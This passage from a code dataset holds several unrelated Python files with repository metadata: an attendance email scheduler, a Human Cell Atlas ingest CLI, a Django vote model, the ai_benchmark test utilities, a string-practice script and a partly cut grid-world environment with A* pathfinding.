holiday\r\n count = len(loop)\r\n count_value = range(0,count) \r\n for i in count_value:\r\n test = (loop[int(i)].attrib)\r\n if(test[\"value\"] == Str_C_date):\r\n return True\r\n return False\r\n\r\n\r\n def send_message(self,HTML,Str_C_date):\r\n xml = response\r\n SENDER_EMAIL = self.get_ml_vales(\"FromMail\")\r\n print(\"sender mail :\",SENDER_EMAIL)\r\n message = MIMEMultipart()\r\n day = datetime.datetime.strptime(Str_C_date, '%d-%m-%Y').weekday() \r\n if(self.fetchData(Str_C_date)):\r\n alert = self.get_ml_vales(\"HolidaySubject\")\r\n mail_subject = alert+\" \"+Str_C_date\r\n message = MIMEMultipart(\"alternative\", None, [MIMEText(Environment().from_string(HTML).render(Str_C_date=Str_C_date,res = res,), \"html\")])\r\n elif(day == 5 or day == 6):\r\n alert = self.get_ml_vales(\"WeekendSubject\")\r\n mail_subject = alert+\" \"+Str_C_date\r\n message = MIMEMultipart(\"alternative\", None, [MIMEText(Environment().from_string(HTML).render(Str_C_date=Str_C_date,res = res,), \"html\")])\r\n else:\r\n daily = self.get_ml_vales(\"WorkingDaySubject\")\r\n mail_subject = daily+\" \"+Str_C_date\r\n message = MIMEMultipart(\"alternative\", None, [MIMEText(Environment().from_string(HTML).render(Str_C_date=Str_C_date,res = res,), \"html\")])\r\n sender = self.get_ml_vales(\"ToMail\")\r\n x = sender.split(\",\")\r\n for val in x :\r\n RECEIVER_EMAIL = val\r\n print(\"Receiver mail :\",RECEIVER_EMAIL)\r\n SENDER_PASSWORD = self.get_ml_vales(\"Password\")\r\n host = self.get_ml_vales(\"Host\")\r\n port = self.get_ml_vales(\"Port\")\r\n SERVER = host+\":\"+port\r\n message = self.generate_message(SENDER_EMAIL,RECEIVER_EMAIL,HTML,mail_subject,message )\r\n server = smtplib.SMTP(SERVER)\r\n server.ehlo()\r\n server.starttls()\r\n server.login(SENDER_EMAIL, SENDER_PASSWORD)\r\n server.sendmail(SENDER_EMAIL, RECEIVER_EMAIL, message.as_string())\r\n server.quit()\r\n print(\"Mail Sent\")\r\n \r\n\r\n def schedule(self):\r\n interval1 = self.get_ml_vales(\"Interval 1\")\r\n interval2 = self.get_ml_vales(\"Interval 2\")\r\n schedule.every().day.at(interval1).do(self.send_message,HTML,Str_C_date)\r\n schedule.every().day.at(interval2).do(self.send_message,HTML,Str_C_date)\r\n while 1:\r\n schedule.run_pending()\r\n #time.sleep(1)\r\n\r\n\r\n\r\nHTML = \"\"\"\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n

The Attendance Report {{Str_C_date}}


\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n {% if res is defined %}\r\n {% for list in res %}\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n {% else %}\r\n \r\n \r\n \r\n {% endfor %}\r\n {% endif %}\r\n \r\n
S.NoEmployee NameAttendance DateIn TimeOut Time
{{list[0]}}{{list[1]}}{{list[2]}}{{list[3]}}{{list[4]}}
No Record not found
\r\n \r\n\r\n\"\"\"\r\nobj = AttendanceEmail()\r\nobj.schedule()\r\n#obj.send_message(HTML,Str_C_date)","repo_name":"ALPHABASE22/Project","sub_path":"Riverstone Finish/mail.py","file_name":"mail.py","file_ext":"py","file_size_in_byte":4697,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"22283789146","text":"#!/usr/bin/env python\nimport datetime\nimport logging\nimport os\nimport sys\nimport uuid\n\nfrom optparse import OptionParser\n\nfrom ingest.api.dssapi import DssApi\nfrom ingest.api.ingestapi import IngestApi\nfrom ingest.api.stagingapi import StagingApi\nfrom ingest.exporter.ingestexportservice import IngestExporter\nfrom ingest.exporter.staging import StagingService, StagingInfoRepository\nfrom ingest.utils.s2s_token_client import S2STokenClient\nfrom ingest.utils.token_manager import TokenManager\n\nif __name__ == '__main__':\n format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'\n logging.basicConfig(format=format, stream=sys.stdout, level=logging.INFO)\n\n parser = OptionParser()\n parser.add_option(\"-b\", \"--bundle-uuid\",\n help=\"Bundle UUID (optional)\")\n parser.add_option(\"-v\", \"--bundle-version\",\n help=\"Bundle Version (optional)\")\n parser.add_option(\"-e\", \"--submission-uuid\",\n help=\"Submission envelope UUID for which to generate the bundle (Required)\")\n parser.add_option(\"-p\", \"--process-uuid\",\n help=\"Process UUID (Required)\")\n parser.add_option(\"-D\", \"--dry\", help=\"do a dry run without submitting to ingest\", action=\"store_true\",\n default=False)\n parser.add_option(\"-o\", \"--output\", dest=\"output\",\n help=\"Output directory where to dump json files submitted to ingest (Optional)\", metavar=\"FILE\",\n default=None)\n parser.add_option(\"-i\", \"--ingest\", help=\"the URL to the ingest API (Required)\")\n parser.add_option(\"-s\", \"--staging\", help=\"the URL to the staging API\")\n parser.add_option(\"-d\", \"--dss\", help=\"the URL to the datastore service\")\n parser.add_option(\"-l\", \"--log\", help=\"the logging level\", default='INFO')\n\n (options, args) = parser.parse_args()\n\n if not options.submission_uuid:\n print(\"You must supply a Submission Envelope UUID\")\n exit(2)\n\n if not options.process_uuid:\n print(\"You must supply a process UUID.\")\n exit(2)\n\n bundle_uuid = str(uuid.uuid4())\n bundle_version = datetime.datetime.utcnow().strftime(\"%Y-%m-%dT%H%M%S.%fZ\")\n\n if options.bundle_uuid:\n bundle_uuid = options.bundle_uuid\n\n if options.bundle_version:\n bundle_version = options.bundle_version\n\n dss_api = DssApi(url=options.dss)\n s2s_token_client = S2STokenClient()\n gcp_credentials_file = os.environ.get('GOOGLE_APPLICATION_CREDENTIALS')\n s2s_token_client.setup_from_file(gcp_credentials_file)\n token_manager = TokenManager(token_client=s2s_token_client)\n ingest_api = IngestApi(token_manager=token_manager)\n staging_api = StagingApi(url=options.staging)\n staging_info_repo = StagingInfoRepository(ingest_client=ingest_api)\n staging_service = StagingService(staging_client=staging_api, staging_info_repository=staging_info_repo)\n exporter = IngestExporter(staging_service=staging_service, ingest_api=ingest_api, dss_api=dss_api)\n exporter.export_bundle(bundle_uuid=bundle_uuid,\n bundle_version=bundle_version,\n submission_uuid=options.submission_uuid,\n process_uuid=options.process_uuid)\n","repo_name":"HumanCellAtlas/ingest-client","sub_path":"cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":3249,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"5"} +{"seq_id":"2707817177","text":"from django.db import models\nfrom dwalls.models.wall import Wall\nfrom dwalls.models.account import Account\n\nclass Vote(models.Model):\n VOTE_TYPE = (\n ('L', 'LIKE'),\n ('D', 'DISLIKE')\n )\n account = models.ForeignKey(\n Account, related_name='vote', blank=True, null=True)\n wall = models.ForeignKey(\n Wall, related_name='vote')\n vote = models.CharField(\n max_len=1,\n choices=VOTE_TYPE)\n\n date = models.DateTimeField(auto_now_add=True, blank=True)\n","repo_name":"Ketzalkotal/dwalls","sub_path":"dwalls_channels/dwalls/models/vote.py","file_name":"vote.py","file_ext":"py","file_size_in_byte":504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"14209205289","text":"# -*- coding: utf-8 -*-\r\n# Copyright 2019-2020 by Andrey Ignatov. All Rights Reserved.\r\n\r\nimport sys\r\nimport os\r\nfrom os import path\r\nimport subprocess\r\nimport platform\r\nimport cpuinfo\r\nimport time\r\nimport multiprocessing\r\nimport logging\r\n\r\nfrom psutil import virtual_memory\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom tensorflow.python.client import device_lib\r\nfrom pkg_resources import parse_version\r\nfrom PIL import Image\r\n\r\nfrom ai_benchmark.update_utils import update_info\r\nfrom ai_benchmark.config import TestConstructor\r\nfrom ai_benchmark.models import *\r\n\r\nMAX_TEST_DURATION = 100\r\n\r\nlogger = logging.getLogger('ai_benchmark')\r\n\r\n\r\nclass BenchmarkResults:\r\n def __init__(self):\r\n self.results_inference_norm = []\r\n self.results_training_norm = []\r\n\r\n self.results_inference = []\r\n self.results_training = []\r\n\r\n self.inference_score = 0\r\n self.training_score = 0\r\n\r\n self.ai_score = 0\r\n\r\n\r\nclass Result:\r\n def __init__(self, mean, std):\r\n self.mean = mean\r\n self.std = std\r\n\r\n\r\nclass PublicResults:\r\n def __init__(self):\r\n self.test_results = {}\r\n self.ai_score = None\r\n\r\n self.inference_score = None\r\n self.training_score = None\r\n\r\n\r\nclass TestInfo:\r\n def __init__(self, _type, precision, use_cpu, verbose, cpu_cores, inter_threads, intra_threads):\r\n from ai_benchmark import __version__\r\n self._type = _type\r\n self.version = __version__\r\n self.py_version = sys.version\r\n self.tf_version = get_tf_version()\r\n self.tf_ver_2 = parse_version(self.tf_version) > parse_version('1.99')\r\n self.platform_info = get_platform_info()\r\n self.cpu_model = get_cpu_model()\r\n self.cpu_cores = cpu_cores or get_num_cpu_cores()\r\n self.inter_threads = inter_threads or self.cpu_cores * 2\r\n self.intra_threads = intra_threads or self.cpu_cores * 2\r\n self.cpu_ram = get_cpu_ram()\r\n self.is_cpu_build = is_cpu_build()\r\n self.is_cpu_inference = (is_cpu_build() or use_cpu)\r\n self.gpu_devices = get_gpu_models()\r\n self.cuda_version, self.cuda_build = get_cuda_info()\r\n self.precision = precision\r\n self.verbose_level = verbose\r\n self.results = None\r\n self.path = path.dirname(__file__)\r\n\r\n\r\ndef get_time_seconds():\r\n return int(time.time())\r\n\r\n\r\ndef get_time_ms():\r\n return int(round(time.time() * 1000))\r\n\r\n\r\ndef resize_image(image, dimensions):\r\n\r\n image = np.asarray(image)\r\n\r\n height = image.shape[0]\r\n width = image.shape[1]\r\n\r\n aspect_ratio_image = float(width) / height\r\n aspect_ratio_target = float(dimensions[1]) / dimensions[0]\r\n\r\n if aspect_ratio_target == aspect_ratio_image:\r\n image = Image.fromarray(image).resize((dimensions[1], dimensions[0]))\r\n\r\n elif aspect_ratio_image < aspect_ratio_target:\r\n new_height = int(float(width) / aspect_ratio_target)\r\n offset = int((height - new_height) / 2)\r\n image = image[offset:offset + new_height, :, :]\r\n image = Image.fromarray(image).resize((dimensions[1], dimensions[0]))\r\n\r\n else:\r\n new_width = int(float(height) * aspect_ratio_target)\r\n offset = int((width - new_width) / 2)\r\n image = image[:, offset:offset + new_width, :]\r\n image = Image.fromarray(image).resize((dimensions[1], dimensions[0]))\r\n\r\n return image\r\n\r\n\r\ndef load_data(test_type, dimensions):\r\n\r\n data = None\r\n if test_type == \"classification\":\r\n\r\n data = np.zeros(dimensions)\r\n for j in range(dimensions[0]):\r\n\r\n image = Image.open(path.join(path.dirname(__file__), \"data/classification/\" + str(j) + \".jpg\"))\r\n image = resize_image(image, [dimensions[1], dimensions[2]])\r\n data[j] = image\r\n\r\n if test_type == \"enhancement\":\r\n\r\n data = np.zeros(dimensions)\r\n for j in range(dimensions[0]):\r\n image = Image.open(path.join(path.dirname(__file__), \"data/enhancement/\" + str(j) + \".jpg\"))\r\n image = resize_image(image, [dimensions[1], dimensions[2]])\r\n data[j] = image\r\n\r\n if test_type == \"segmentation\":\r\n\r\n data = np.zeros(dimensions)\r\n for j in range(dimensions[0]):\r\n image = Image.open(path.join(path.dirname(__file__), \"data/segmentation/\" + str(j) + \".jpg\"))\r\n image = resize_image(image, [dimensions[1], dimensions[2]])\r\n data[j] = image\r\n\r\n if test_type == \"nlp\":\r\n data = np.random.uniform(-4, 4, (dimensions[0], dimensions[1], dimensions[2]))\r\n\r\n if test_type == \"nlp-text\":\r\n data = \"This is a story of how a Baggins had an adventure, \" \\\r\n \"and found himself doing and saying things altogether unexpected.\"\r\n\r\n return data\r\n\r\n\r\ndef load_targets(test_type, dimensions):\r\n\r\n data = None\r\n if test_type == \"classification\" or test_type == \"nlp\":\r\n\r\n data = np.zeros(dimensions)\r\n for j in range(dimensions[0]):\r\n data[j, np.random.randint(dimensions[1])] = 1\r\n\r\n if test_type == \"enhancement\":\r\n\r\n data = np.zeros(dimensions)\r\n for j in range(dimensions[0]):\r\n image = Image.open(path.join(path.dirname(__file__), \"data/enhancement/\" + str(j) + \".jpg\"))\r\n image = resize_image(image, [dimensions[1], dimensions[2]])\r\n data[j] = image\r\n\r\n if test_type == \"enhancement\":\r\n\r\n data = np.zeros(dimensions)\r\n for j in range(dimensions[0]):\r\n image = Image.open(path.join(path.dirname(__file__), \"data/enhancement/\" + str(j) + \".jpg\"))\r\n image = resize_image(image, [dimensions[1], dimensions[2]])\r\n data[j] = image\r\n\r\n if test_type == \"segmentation\":\r\n\r\n data = np.zeros(dimensions)\r\n for j in range(dimensions[0]):\r\n image = Image.open(path.join(path.dirname(__file__), \"data/segmentation/\" + str(j) + \"_segmented.jpg\"))\r\n image = resize_image(image, [dimensions[1], dimensions[2]])\r\n data[j] = image\r\n\r\n return data\r\n\r\n\r\ndef construct_optimizer(sess, output_, target_, loss_function, optimizer, learning_rate, tf_ver_2):\r\n\r\n if loss_function == \"MSE\":\r\n loss_ = 2 * tf.nn.l2_loss(output_ - target_)\r\n\r\n if optimizer == \"Adam\":\r\n if tf_ver_2:\r\n optimizer = tf.compat.v1.train.AdamOptimizer(learning_rate)\r\n else:\r\n optimizer = tf.train.AdamOptimizer(learning_rate)\r\n\r\n train_step = optimizer.minimize(loss_)\r\n\r\n if tf_ver_2:\r\n sess.run(tf.compat.v1.variables_initializer(optimizer.variables()))\r\n else:\r\n sess.run(tf.variables_initializer(optimizer.variables()))\r\n\r\n return train_step\r\n\r\n\r\ndef get_model_src(test, testInfo, session):\r\n\r\n train_vars = None\r\n\r\n if testInfo.tf_ver_2 and test.use_src:\r\n\r\n # Bypassing TensorFlow 2.0+ RNN Bugs\r\n\r\n if test.model == \"LSTM-Sentiment\":\r\n input_ = tf.compat.v1.placeholder(tf.float32, [None, 1024, 300], name=\"input\")\r\n output_ = LSTM_Sentiment(input_)\r\n\r\n if test.model == \"Pixel-RNN\":\r\n input_ = tf.compat.v1.placeholder(tf.float32, [None, 64, 64, 3], name=\"input\")\r\n output_ = PixelRNN(input_)\r\n\r\n target_ = tf.compat.v1.placeholder(tf.float32, test.training[0].get_output_dims())\r\n\r\n train_step_ = construct_optimizer(session, output_, target_, test.training[0].loss_function,\r\n test.training[0].optimizer, test.training[0].learning_rate, testInfo.tf_ver_2)\r\n\r\n train_vars = [target_, train_step_]\r\n\r\n else:\r\n\r\n if testInfo.tf_ver_2:\r\n tf.compat.v1.train.import_meta_graph(test.model_src, clear_devices=True)\r\n g = tf.compat.v1.get_default_graph()\r\n else:\r\n tf.train.import_meta_graph(test.model_src, clear_devices=True)\r\n g = tf.get_default_graph()\r\n\r\n input_ = g.get_tensor_by_name('input:0')\r\n output_ = g.get_tensor_by_name('output:0')\r\n\r\n return input_, output_, train_vars\r\n\r\n\r\ndef compute_stats(results):\r\n if len(results) > 1:\r\n results = results[1:]\r\n return np.mean(results), np.std(results)\r\n\r\n\r\ndef print_test_results(prefix, batch_size, dimensions, mean, std):\r\n if std > 1 and mean > 100:\r\n prt_str = \"%s | batch=%d, size=%dx%d: %.d ± %.d ms\" % (\r\n prefix, batch_size, dimensions[1], dimensions[2], round(mean), round(std))\r\n else:\r\n prt_str = \"%s | batch=%d, size=%dx%d: %.1f ± %.1f ms\" % (\r\n prefix, batch_size, dimensions[1], dimensions[2], mean, std)\r\n logger.info(prt_str)\r\n\r\n\r\ndef print_intro():\r\n import ai_benchmark\r\n logger.info(\">> AI-Benchmark - %s\", ai_benchmark.__version__)\r\n logger.info(\">> Let the AI Games begin\")\r\n\r\n\r\ndef print_test_info(testInfo):\r\n logger.info(\"* TF Version: %s\", testInfo.tf_version)\r\n logger.info(\"* Platform: %s\", testInfo.platform_info)\r\n logger.info(\"* CPU: %s\", testInfo.cpu_model)\r\n logger.info(\"* CPU RAM: %s GB\", testInfo.cpu_ram)\r\n\r\n if not testInfo.is_cpu_inference:\r\n\r\n for gpu_id, gpu_info in enumerate(testInfo.gpu_devices):\r\n logger.info(\"* GPU/%s: %s\", gpu_id, gpu_info[0])\r\n logger.info(\"* GPU RAM: %s GB\", gpu_info[1])\r\n\r\n logger.info(\"* CUDA Version: %s\", testInfo.cuda_version)\r\n logger.info(\"* CUDA Build: %s\", testInfo.cuda_build)\r\n\r\n update_info(\"launch\", testInfo)\r\n logger.warning(\"The benchmark is running...\")\r\n logger.warning(\"The tests might take up to 20 minutes\")\r\n logger.warning(\"Please don't interrupt the script\")\r\n\r\n\r\ndef get_tf_version():\r\n try:\r\n return tf.__version__\r\n except:\r\n pass\r\n return \"N/A\"\r\n\r\n\r\ndef get_platform_info():\r\n platform_info = \"N/A\"\r\n try:\r\n return platform.platform()\r\n except:\r\n pass\r\n return platform_info\r\n\r\n\r\ndef get_cpu_model():\r\n try:\r\n return cpuinfo.get_cpu_info()['brand']\r\n except:\r\n return \"N/A\"\r\n\r\n\r\ndef get_num_cpu_cores():\r\n try:\r\n return multiprocessing.cpu_count()\r\n except:\r\n return -1\r\n\r\n\r\ndef get_cpu_ram():\r\n try:\r\n return str(round(virtual_memory().total / (1024. ** 3)))\r\n except:\r\n return \"N/A\"\r\n\r\n\r\ndef is_cpu_build():\r\n is_cpu_build = True\r\n try:\r\n if tf.test.gpu_device_name():\r\n is_cpu_build = False\r\n except:\r\n pass\r\n return is_cpu_build\r\n\r\n\r\ndef get_gpu_models():\r\n gpu_models = [[\"N/A\", \"N/A\"]]\r\n gpu_id = 0\r\n try:\r\n tf_gpus = str(device_lib.list_local_devices())\r\n while tf_gpus.find('device_type: \"GPU\"') != -1 or tf_gpus.find('device_type: \"XLA_GPU\"') != -1:\r\n\r\n device_type_gpu = tf_gpus.find('device_type: \"GPU\"')\r\n if device_type_gpu == -1:\r\n device_type_gpu = tf_gpus.find('device_type: \"XLA_GPU\"')\r\n\r\n tf_gpus = tf_gpus[device_type_gpu:]\r\n tf_gpus = tf_gpus[tf_gpus.find('memory_limit:'):]\r\n gpu_ram = tf_gpus[:tf_gpus.find(\"\\n\")]\r\n\r\n gpu_ram = int(gpu_ram.split(\" \")[1]) / (1024.**3)\r\n gpu_ram = str(round(gpu_ram * 10) / 10)\r\n\r\n tf_gpus = tf_gpus[tf_gpus.find('physical_device_desc:'):]\r\n tf_gpus = tf_gpus[tf_gpus.find('name:'):]\r\n gpu_model = tf_gpus[6:tf_gpus.find(',')]\r\n\r\n if gpu_id == 0:\r\n gpu_models = [[gpu_model, gpu_ram]]\r\n else:\r\n gpu_models.append([gpu_model, gpu_ram])\r\n\r\n gpu_id += 1\r\n except:\r\n pass\r\n return gpu_models\r\n\r\n\r\ndef get_cuda_info():\r\n cuda_version = \"N/A\"\r\n cuda_build = \"N/A\"\r\n try:\r\n cuda_info = str(subprocess.check_output([\"nvcc\", \"--version\"]))\r\n cuda_info = cuda_info[cuda_info.find(\"release\"):]\r\n cuda_version = cuda_info[cuda_info.find(\" \") + 1:cuda_info.find(\",\")]\r\n cuda_build = cuda_info[cuda_info.find(\",\") + 2:cuda_info.find(\"\\\\\")]\r\n except:\r\n pass\r\n return cuda_version, cuda_build\r\n\r\n\r\ndef print_scores(testInfo, public_results):\r\n\r\n c_inference = 10000\r\n c_training = 10000\r\n\r\n if testInfo._type == \"full\":\r\n\r\n inference_score = geometrical_mean(testInfo.results.results_inference_norm)\r\n if np.isnan(inference_score):\r\n inference_score = 0\r\n training_score = geometrical_mean(testInfo.results.results_training_norm)\r\n if np.isnan(training_score):\r\n training_score = 0\r\n\r\n testInfo.results.inference_score = int(inference_score * c_inference)\r\n testInfo.results.training_score = int(training_score * c_training)\r\n\r\n public_results.inference_score = testInfo.results.inference_score\r\n public_results.training_score = testInfo.results.training_score\r\n\r\n testInfo.results.ai_score = testInfo.results.inference_score + testInfo.results.training_score\r\n public_results.ai_score = testInfo.results.ai_score\r\n\r\n update_info(\"scores\", testInfo)\r\n\r\n logger.info(\"Device Inference Score: %s\", testInfo.results.inference_score)\r\n logger.info(\"Device Training Score: %s\", testInfo.results.training_score)\r\n logger.info(\"Device AI Score: %s\", testInfo.results.ai_score)\r\n logger.info(\"For more information and results, please visit http://ai-benchmark.com/alpha\\n\")\r\n\r\n if testInfo._type == \"inference\":\r\n\r\n inference_score = geometrical_mean(testInfo.results.results_inference_norm)\r\n testInfo.results.inference_score = int(inference_score * c_inference)\r\n\r\n public_results.inference_score = testInfo.results.inference_score\r\n\r\n update_info(\"scores\", testInfo)\r\n\r\n logger.info(\"Device Inference Score: %s\", testInfo.results.inference_score)\r\n logger.info(\"For more information and results, please visit http://ai-benchmark.com/alpha\\n\")\r\n\r\n if testInfo._type == \"training\":\r\n\r\n training_score = geometrical_mean(testInfo.results.results_training_norm)\r\n testInfo.results.training_score = int(training_score * c_inference)\r\n\r\n public_results.training_score = testInfo.results.training_score\r\n\r\n update_info(\"scores\", testInfo)\r\n\r\n logger.info(\"Device Training Score: %s\", testInfo.results.training_score)\r\n logger.info(\"For more information and results, please visit http://ai-benchmark.com/alpha\\n\")\r\n\r\n if testInfo._type == \"micro\":\r\n\r\n inference_score = geometrical_mean(testInfo.results.results_inference_norm)\r\n testInfo.results.inference_score = int(inference_score * c_inference)\r\n\r\n public_results.inference_score = testInfo.results.inference_score\r\n\r\n update_info(\"scores\", testInfo)\r\n\r\n logger.info(\"Device Inference Score: %s\", testInfo.results.inference_score)\r\n logger.info(\"For more information and results, please visit http://ai-benchmark.com/alpha\\n\")\r\n\r\n return public_results\r\n\r\n\r\ndef geometrical_mean(results):\r\n results = np.asarray(results)\r\n try:\r\n return results.prod() ** (1.0 / len(results))\r\n except ZeroDivisionError:\r\n return np.nan\r\n\r\n\r\ndef run_tests(\r\n training,\r\n inference,\r\n micro,\r\n verbose,\r\n use_cpu,\r\n precision,\r\n _type,\r\n start_dir,\r\n test_ids=None,\r\n cpu_cores=None,\r\n inter_threads=None,\r\n intra_threads=None,\r\n ):\r\n testInfo = TestInfo(_type, precision, use_cpu, verbose, cpu_cores, inter_threads, intra_threads)\r\n testInfo.full_suite = (\r\n test_ids is None or\r\n len(test_ids) == len(TestConstructor.BENCHMARK_TESTS)\r\n )\r\n\r\n print_test_info(testInfo)\r\n time.sleep(1)\r\n\r\n benchmark_tests = TestConstructor().get_tests(test_ids)\r\n benchmark_results = BenchmarkResults()\r\n public_results = PublicResults()\r\n os.chdir(path.dirname(__file__))\r\n\r\n iter_multiplier = {\r\n \"dry\": 0,\r\n \"normal\": 1,\r\n \"high\": 10,\r\n }.get(precision, 1)\r\n\r\n ConfigProto = tf.compat.v1.ConfigProto if testInfo.tf_ver_2 else tf.ConfigProto\r\n if use_cpu:\r\n config = ConfigProto(\r\n device_count={'GPU': 0, 'CPU': testInfo.cpu_cores},\r\n inter_op_parallelism_threads=testInfo.inter_threads,\r\n intra_op_parallelism_threads=testInfo.intra_threads,\r\n )\r\n else:\r\n config = None\r\n\r\n for test in benchmark_tests:\r\n\r\n if not (micro and len(test.micro) == 0):\r\n logger.info(\"\\n%s/%s. %s\\n\", test.id, len(benchmark_tests), test.model)\r\n sub_id = 1\r\n\r\n tf.compat.v1.reset_default_graph() if testInfo.tf_ver_2 else tf.reset_default_graph()\r\n session = tf.compat.v1.Session(config=config) if testInfo.tf_ver_2 else tf.Session(config=config)\r\n\r\n with tf.Graph().as_default(), session as sess:\r\n\r\n input_, output_, train_vars_ = get_model_src(test, testInfo, sess)\r\n\r\n if testInfo.tf_ver_2:\r\n tf.compat.v1.global_variables_initializer().run()\r\n if test.type == \"nlp-text\":\r\n sess.run(tf.compat.v1.tables_initializer())\r\n else:\r\n tf.global_variables_initializer().run()\r\n if test.type == \"nlp-text\":\r\n sess.run(tf.tables_initializer())\r\n\r\n if inference or micro:\r\n\r\n for subTest in (test.inference if inference else test.micro):\r\n\r\n time_test_started = get_time_seconds()\r\n inference_times = []\r\n\r\n for i in range(subTest.iterations * iter_multiplier):\r\n\r\n if get_time_seconds() - time_test_started < subTest.max_duration \\\r\n or (i < subTest.min_passes and get_time_seconds() - time_test_started < MAX_TEST_DURATION) \\\r\n or precision == \"high\":\r\n\r\n data = load_data(test.type, subTest.get_input_dims())\r\n time_iter_started = get_time_ms()\r\n sess.run(output_, feed_dict={input_: data})\r\n inference_time = get_time_ms() - time_iter_started\r\n inference_times.append(inference_time)\r\n\r\n logger.debug(\"Inference Time: %s ms\", inference_time)\r\n\r\n time_mean, time_std = compute_stats(inference_times)\r\n\r\n public_id = \"%d.%d\" % (test.id, sub_id)\r\n public_results.test_results[public_id] = Result(time_mean, time_std)\r\n\r\n benchmark_results.results_inference.append(time_mean)\r\n benchmark_results.results_inference_norm.append(float(subTest.ref_time) / time_mean)\r\n\r\n prefix = \"%d.%d - inference\" % (test.id, sub_id)\r\n print_test_results(prefix, subTest.batch_size, subTest.get_input_dims(), time_mean, time_std)\r\n sub_id += 1\r\n\r\n if training:\r\n\r\n for subTest in test.training:\r\n\r\n if train_vars_ is None:\r\n\r\n if testInfo.tf_ver_2:\r\n target_ = tf.compat.v1.placeholder(tf.float32, subTest.get_output_dims())\r\n else:\r\n target_ = tf.placeholder(tf.float32, subTest.get_output_dims())\r\n\r\n train_step = construct_optimizer(sess, output_, target_, subTest.loss_function,\r\n subTest.optimizer, subTest.learning_rate, testInfo.tf_ver_2)\r\n\r\n else:\r\n\r\n target_ = train_vars_[0]\r\n train_step = train_vars_[1]\r\n\r\n time_test_started = get_time_seconds()\r\n training_times = []\r\n\r\n for i in range(subTest.iterations * iter_multiplier):\r\n\r\n if get_time_seconds() - time_test_started < subTest.max_duration \\\r\n or (i < subTest.min_passes and get_time_seconds() - time_test_started < MAX_TEST_DURATION) \\\r\n or precision == \"high\":\r\n\r\n data = load_data(test.type, subTest.get_input_dims())\r\n target = load_targets(test.type, subTest.get_output_dims())\r\n\r\n time_iter_started = get_time_ms()\r\n sess.run(train_step, feed_dict={input_: data, target_: target})\r\n training_time = get_time_ms() - time_iter_started\r\n training_times.append(training_time)\r\n\r\n logger.debug(\"Training Time: %s ms\", training_time)\r\n\r\n time_mean, time_std = compute_stats(training_times)\r\n\r\n public_id = \"%d.%d\" % (test.id, sub_id)\r\n public_results.test_results[public_id] = Result(time_mean, time_std)\r\n\r\n benchmark_results.results_training.append(time_mean)\r\n benchmark_results.results_training_norm.append(float(subTest.ref_time) / time_mean)\r\n\r\n prefix = \"%d.%d - training \" % (test.id, sub_id)\r\n print_test_results(prefix, subTest.batch_size, subTest.get_input_dims(), time_mean, time_std)\r\n sub_id += 1\r\n\r\n sess.close()\r\n\r\n testInfo.results = benchmark_results\r\n public_results = print_scores(testInfo, public_results)\r\n\r\n os.chdir(start_dir)\r\n return testInfo, public_results\r\n","repo_name":"cloudmercato/ai-benchmark","sub_path":"ai_benchmark/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":21502,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"36392664102","text":"__author__ = 'honeymathew'\n\nx = \"hai honeyss\\n\"\n# print(x[-1])\n# print(len(\"honey\"))\n#print(x[4])\n\n# s1 = \"hello\"\n# s2 = \"honey\"\n# print(s1+ \" \"+ s2)\n\n#print(x*2)\n#print(\"\\012\")\n#print('a\\n\\tb')\n\nx = \"split string using the method called split\"\nprint(x.split())\n\n#print(\"::\".join([\"join\", \"using\", \"the\", \"method\", \"called\", \"join\"]))\n\n#x = 'mississippi'\n#print(x.split('ss'))\n# print(x.find('s'))\n# print(x.find('g'))\n#print(x.replace('ss', '++++'))\n\n# x = \"123\"\n# print(x.isalpha())\n\n\n#print(\"{0} is the {1} of {3} \".format(\"amo\", \"food\", \"god\"))","repo_name":"honeymathew/PythonTraining","sub_path":"strinhs.py","file_name":"strinhs.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3706912671","text":"import numpy as np\nimport heapq\nimport os \nimport time\nfrom termcolor import colored\n\nclass GridEnvironment:\n def __init__(self):\n self.size = 6\n self.reset()\n\n def reset(self):\n self.agent_pos = [0, 0]\n self.resource_pos = np.random.choice(36, 15, replace=False)\n self.grid = np.zeros((self.size, self.size))\n np.put(self.grid, self.resource_pos, 1)\n self.resource_count = 0\n self.rewards = 0\n self.steps = 0\n return self.get_state()\n\n def get_state(self):\n state = {'grid': self.grid, 'agent_pos': self.agent_pos, 'resource_count': self.resource_count}\n return state\n\n def step(self, action):\n if action == 'up':\n self.agent_pos[0] = max(0, self.agent_pos[0]-1)\n self.rewards -= 1\n elif action == 'down':\n self.agent_pos[0] = min(self.size-1, self.agent_pos[0]+1)\n self.rewards -= 1\n elif action == 'left':\n self.agent_pos[1] = max(0, self.agent_pos[1]-1)\n self.rewards -= 1\n elif action == 'right':\n self.agent_pos[1] = min(self.size-1, self.agent_pos[1]+1)\n self.rewards -= 1\n elif action == 'collect':\n if self.grid[self.agent_pos[0], self.agent_pos[1]] == 1:\n self.grid[self.agent_pos[0], self.agent_pos[1]] = 0\n self.resource_count += 1\n self.rewards += 16\n elif action == 'build':\n if self.grid[self.agent_pos[0], self.agent_pos[1]] == 0 and self.resource_count >= 3:\n self.grid[self.agent_pos[0], self.agent_pos[1]] = 2\n self.resource_count -= 3\n self.rewards += 60\n\n self.steps += 1\n done = self.is_episode_done()\n return self.get_state(), done\n\n def is_episode_done(self):\n # End the episode after a maximum number of steps\n if self.steps >= self.size**2 * 5 or (np.sum(self.grid == 1) == 0 and self.resource_count == 0):\n return True\n\n \n\n def a_star(self, start, goal, grid):\n def heuristic(a, b):\n return (b[0] - a[0]) ** 2 + (b[1] - a[1]) ** 2\n\n neighbors = [(0,1), (0,-1), (1,0), (-1,0)]\n close_set = set()\n came_from = {}\n gscore = {start: 0}\n fscore = {start: heuristic(start, goal)}\n oheap = 